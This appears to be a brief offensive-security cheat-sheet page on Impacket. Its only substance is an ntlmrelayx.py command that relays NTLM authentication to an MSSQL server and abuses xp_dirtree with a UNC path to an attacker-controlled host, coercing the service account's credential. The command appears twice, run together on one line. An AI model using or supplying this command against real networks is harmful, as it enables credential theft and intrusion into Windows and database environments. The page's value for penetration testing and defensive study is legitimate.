Impacket

Assorted Impacket Commands

ntlmrelayx.py

Leveraging ntlmrelayx to relay credential to MSSQL Server and attempt to elicit the credential of the underlying service account through abusing xp_dirtree.

ntlmrelayx.py -t mssql://mssql.example.com -c 'EXEC xp_dirtree "\\192.168.1.100\credentials"'ntlmrelayx.py -t mssql://mssql.example.com -c 'EXEC xp_dirtree "\\192.168.1.100\credentials"'

NextLinux

Last updated 1 year ago

Was this helpful?